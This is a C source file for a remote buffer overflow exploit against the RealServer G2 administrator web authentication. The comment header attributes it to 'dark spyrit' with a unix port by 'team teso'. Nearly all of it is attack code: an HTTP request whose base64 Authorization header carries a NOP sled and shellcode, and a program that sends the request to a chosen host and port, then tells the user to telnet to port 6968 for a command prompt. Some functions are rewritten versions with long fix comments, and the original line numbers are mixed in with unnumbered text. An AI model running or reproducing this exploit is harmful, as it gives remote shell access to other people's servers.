
/* RealNetworks RealServer G2 buffer overflow exploit
  2.  *
  3.  * by dark spyrit <dspyrit@beavuh.org>
  4.  * quick unix port by team teso
  5.  *
  6.  * the windows binary is available at http://www.beavuh.org.
  7.  *
  8.  * This exploits a buffer overflow in RealServers web authentication on
  9.  * the administrator port - hence the reason the shellcode is base64 encoded.
  10.  * This has been tested on the NT version with a default installation.
  11.  * If RealServer is installed in a different directory than the default, the
  12.  * buffer will need to be adjusted accordingly.
  13.  * The administrator port is randomly selected at installation, but as you'll
  14.  * only be testing on your own networks this won't matter :)
  15.  */
  16.  
  17. #include <sys/types.h>
  18. #include <sys/time.h>
  19. #include <sys/socket.h>
  20. #include <netinet/in.h>
  21. #include <arpa/inet.h>
  22. #include <unistd.h>
  23. #include <errno.h>
  24. #include <stdlib.h>
  25. #include <stdio.h>
  26. #include <string.h>
  27. #include <fcntl.h>
  28. #include <netdb.h>
  29.  
  30.  
  31. /* local functions
  32.  */
/* Resolve a dotted-quad string or a hostname to an IPv4 address in
 * network byte order.  Returns 0 when neither inet_addr() nor
 * gethostbyname() can produce an address.  The returned value is widened
 * to unsigned long but only the low 32 bits carry the address. */
unsigned long int    net_resolve (char *host);
/* Open a TCP connection to server:port, filling *cs with the address used.
 * The connect is done non-blocking and waits at most `sec` seconds.
 * Returns the connected descriptor (restored to blocking mode) or -1;
 * errno is set on the timeout and SO_ERROR failure paths. */
int            net_connect (struct sockaddr_in *cs, char *server,
    unsigned short int port, int sec);
  36.  
  37. unsigned char    sploit[] =
  38.     "GET /admin/index.html HTTP/1.0\x0d\x0a"
  39.     "Connection: Keep-Alive\x0d\x0a"
  40.     "User-Agent: Mozilla/4.04 [en] (X11; I; Beavuh OS .9 i486; Nav)\x0d\x0a"
  41.     "Host: 111.111.11.1:1111\x0d\x0a"
  42.     "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\x0d\x0a"
  43.     "Accept-Language: en\x0d\x0a"
  44.     "Accept-Charset: iso-8859-1,*,utf-8\x0d\x0a"
  45.     "Authorization: Basic kJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  46.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  47.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  48.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  49.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  50.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  51.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  52.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  53.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  54.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  55.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  56.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  57.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  58.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  59.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  60.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  61.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  62.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  63.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  64.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  65.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  66.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  67.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  68.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  69.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  70.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  71.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  72.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  73.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  74.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  75.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  76.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  77.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  78.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  79.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  80.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  81.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  82.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  83.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  84.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  85.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  86.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  87.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  88.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  89.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  90.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  91.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  92.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  93.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  94.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  95.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  96.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  97.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  98.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  99.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  100.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  101.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  102.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  103.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  104.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  105.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  106.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  107.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  108.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  109.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  110.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  111.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  112.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  113.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  114.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  115.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  116.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  117.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  118.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  119.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  120.     "JCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJC"
  121.     "QkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQkJCQk"
  122.     "JCQkJCQkJCQkJCQkJCQkJCQ6wiQkJBXRToAkJCQkJCQkJCQkJCQkJCQkIt0JPiL/jPAUPf"
  123.     "QUFnyr1mxxovHSIAwmeL6M/aWu5mcQEbB6whW/xOL0PwzybELSTLArITAdflSUVZSs5T/E"
  124.     "6tZWuLsMsCshMB1+bOcVv8Ti9D8M8mxBjLArITAdflSUVZSs5T/E6tZWuLsg8YFM8BQQFB"
  125.     "AUP9X6JNqEFZT/1fsagJT/1fwM8BXULAMq1irQKtfSFBXVq1W/1fASFBXrVatVv9XwEiwR"
  126.     "IkHV/9XxDPAi0b0iUc8iUdAiwaJRzgzwGa4AQGJRyxXVzPAUFBQQFBIUFCtVjPAUP9XyP9"
  127.     "28P9XzP92/P9XzEhQUFP/V/SL2DPAtARQwegEUP9X1IvwM8CLyLUEUFBXUVD/d6j/V9CDP"
  128.     "wF8IjPAUFf/N1b/d6j/V9wLwHQvM8BQ/zdWU/9X+GpQ/1fg68gzwFC0BFBWU/9X/FczyVF"
  129.     "QVv93rP9X2GpQ/1fg66pQ/1fkkNLcy9fc1aqrmdrr/Pjt/Mnw6fyZ3vztyu346+3s6dD3/"
  130.     "/bYmdrr/Pjt/Mnr9vr86urYmdr19ur80fj3/fX8mcn8/PLX+PT8/cnw6fyZ3vX2+/j12PX"
  131.     "19vqZzuvw7fzf8PX8mcv8+P3f8PX8mcr1/Pzpmdzh8O3J6/b6/Orqmc7K1trSqquZ6vb68"
  132.     "vztmfvw9/2Z9fDq7fz3mfj6+vzp7Znq/Pf9mev8+u+Zm5mCoZmZmZmZmZmZmZmZmfr0/bf"
  133.     "84fyZ/////w==\x0d\x0a\x0d\x0a\x00";
  134.  
  135.  
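/* Entry point: parse <host> <admin_port>, connect with a 45 second timeout,
 * send the prebuilt `sploit` request, wait one second and close.
 *
 * Fixes over the original: the port is parsed with strtol() and range
 * checked instead of an unchecked atoi(); the descriptor test is `< 0`
 * (net_connect may legitimately return 0); write()'s result is checked so a
 * failed or short write is reported rather than silently ignored; and the
 * local `socket` no longer shadows the socket(2) function. */
int
main (int argc, char **argv)
{
    int            fd;
    char            *server;
    char            *end;
    long            port;
    size_t            len;
    ssize_t            n;
    struct sockaddr_in    sa;

    if (argc != 3) {
        printf ("RealServer G2 exploit [NT] - please check http://www.beavuh.org for info.\n"
            "by dark spyrit <dspyrit@beavuh.org>, port by team teso\n\n"
            "usage: %s <host> <admin_port>\n"
            "eg - %s host.com 6666\n"
            "the exploit will spawn a command prompt on port 6968\n\n", argv[0], argv[0]);

        exit (EXIT_FAILURE);
    }

    server = argv[1];

    /* atoi() reports no errors and the original truncated the result to
     * 16 bits; reject anything that is not a valid TCP port number */
    errno = 0;
    port = strtol (argv[2], &end, 10);
    if (end == argv[2] || *end != '\0' || errno == ERANGE
        || port < 1 || port > 65535) {
        fprintf (stderr, "invalid port: %s\n", argv[2]);
        exit (EXIT_FAILURE);
    }

    /* net_connect returns -1 on failure; 0 is a valid descriptor */
    fd = net_connect (&sa, server, (unsigned short int) port, 45);
    if (fd < 0) {
        perror ("net_connect");
        exit (EXIT_FAILURE);
    }

    /* sploit is unsigned char[]; cast for strlen() to avoid the pointer
     * signedness mismatch */
    len = strlen ((const char *) sploit);
    n = write (fd, sploit, len);
    if (n < 0 || (size_t) n != len) {
        /* the original ignored write()'s result; a failed or short write
         * means the request did not leave intact */
        if (n < 0)
            perror ("write");
        else
            fprintf (stderr, "write: short write (%zu of %zu bytes)\n",
                (size_t) n, len);
        close (fd);
        exit (EXIT_FAILURE);
    }
    sleep (1);
    close (fd);

    printf ("data sent. try \"telnet %s 6968\" now \n", server);

    exit (EXIT_SUCCESS);
}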
  171.  
  172.  
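/* Resolve `host` (dotted quad or hostname) to an IPv4 address in network
 * byte order.  Returns 0 on failure (NULL host, unresolvable name, or a
 * resolver answer that is not a 4-byte AF_INET address).
 *
 * Fixes over the original: inet_addr() returns a 32-bit in_addr_t, and the
 * original stored it in a `long` and compared against -1, which never
 * matches on LP64 targets, so the DNS fallback was skipped and INADDR_NONE
 * (0xffffffff) was handed back as the "address" of every hostname.  The
 * original also dereferenced h_addr as an unsigned long, over-reading the
 * 4-byte address on 64-bit targets; the copy is now bounded by sizeof. */
unsigned long int
net_resolve (char *host)
{
    in_addr_t        addr;
    struct hostent    *he;

    /* inet_addr(NULL) and gethostbyname(NULL) are undefined */
    if (host == NULL)
        return (0);

    addr = inet_addr (host);
    if (addr != INADDR_NONE)
        return (addr);

    /* "255.255.255.255" is indistinguishable from INADDR_NONE here and
     * falls through to the resolver, exactly as in the original */
    he = gethostbyname (host);
    if (he == NULL || he->h_addrtype != AF_INET
        || he->h_length != (int) sizeof addr
        || he->h_addr_list == NULL || he->h_addr_list[0] == NULL)
        return (0);

    memcpy (&addr, he->h_addr_list[0], sizeof addr);
    return (addr);
}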
  191.  
  192.  
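/* Connect to server:port over TCP with a `sec` second timeout.  On success
 * *cs holds the address used and the connected descriptor is returned in
 * blocking mode.  On failure -1 is returned; errno is preserved from the
 * failing call (ETIMEDOUT on timeout, the SO_ERROR value when the
 * non-blocking connect completed with an error).
 *
 * Fixes over the original: every failure path now closes the descriptor
 * (select() error, getsockopt() error, SO_ERROR set, the unreachable
 * "neither set" branch and the final fcntl() all leaked it); errno is
 * saved across close(); getsockopt()'s length argument is a socklen_t, not
 * an int; SO_ERROR is consulted whenever the socket becomes readable or
 * writable rather than only when both are set, which is the documented way
 * to learn the outcome of a non-blocking connect; FD_SET is guarded against
 * fd >= FD_SETSIZE (undefined behaviour); and the name is resolved before a
 * socket is created so a bad name cannot leak one. */
int
net_connect (struct sockaddr_in *cs, char *server,
    unsigned short int port, int sec)
{
    int        n, flags, error, saved_errno;
    int        fd;
    socklen_t    len;
    struct timeval    tv;
    fd_set        rset, wset;

    if (cs == NULL || server == NULL) {
        errno = EINVAL;
        return (-1);
    }

    memset (cs, 0, sizeof *cs);
    cs->sin_family = AF_INET;
    cs->sin_port = htons (port);

    /* net_resolve() returns 0 on failure; it does not set errno */
    cs->sin_addr.s_addr = net_resolve (server);
    if (cs->sin_addr.s_addr == 0)
        return (-1);

    fd = socket (AF_INET, SOCK_STREAM, 0);
    if (fd == -1)
        return (-1);

    /* FD_SET on a descriptor at or beyond FD_SETSIZE is undefined */
    if (fd >= FD_SETSIZE) {
        errno = EMFILE;
        goto fail;
    }

    flags = fcntl (fd, F_GETFL, 0);
    if (flags == -1)
        goto fail;
    if (fcntl (fd, F_SETFL, flags | O_NONBLOCK) == -1)
        goto fail;

    n = connect (fd, (struct sockaddr *) cs, sizeof *cs);
    if (n == 0)
        goto done;          /* connected immediately (e.g. loopback) */
    if (errno != EINPROGRESS)
        goto fail;

    FD_ZERO (&rset);
    FD_ZERO (&wset);
    FD_SET (fd, &rset);
    FD_SET (fd, &wset);
    tv.tv_sec = sec;
    tv.tv_usec = 0;

    n = select (fd + 1, &rset, &wset, NULL, &tv);
    if (n == 0) {
        errno = ETIMEDOUT;
        goto fail;
    }
    if (n == -1)
        goto fail;

    /* select() returned > 0 with only this descriptor in the sets, so at
     * least one of them is set; anything else is an internal error */
    if (!FD_ISSET (fd, &rset) && !FD_ISSET (fd, &wset)) {
        errno = EIO;
        goto fail;
    }

    /* readiness alone does not say whether the connect succeeded;
     * SO_ERROR holds the pending error (ECONNREFUSED etc.), or 0 */
    error = 0;
    len = sizeof error;
    if (getsockopt (fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0)
        goto fail;
    if (error != 0) {
        errno = error;
        goto fail;
    }

done:
    /* restore blocking mode for the caller */
    if (fcntl (fd, F_SETFL, flags) == -1)
        goto fail;

    return (fd);

fail:
    /* close() may clobber errno; keep the value that describes the failure */
    saved_errno = errno;
    close (fd);
    errno = saved_errno;
    return (-1);
}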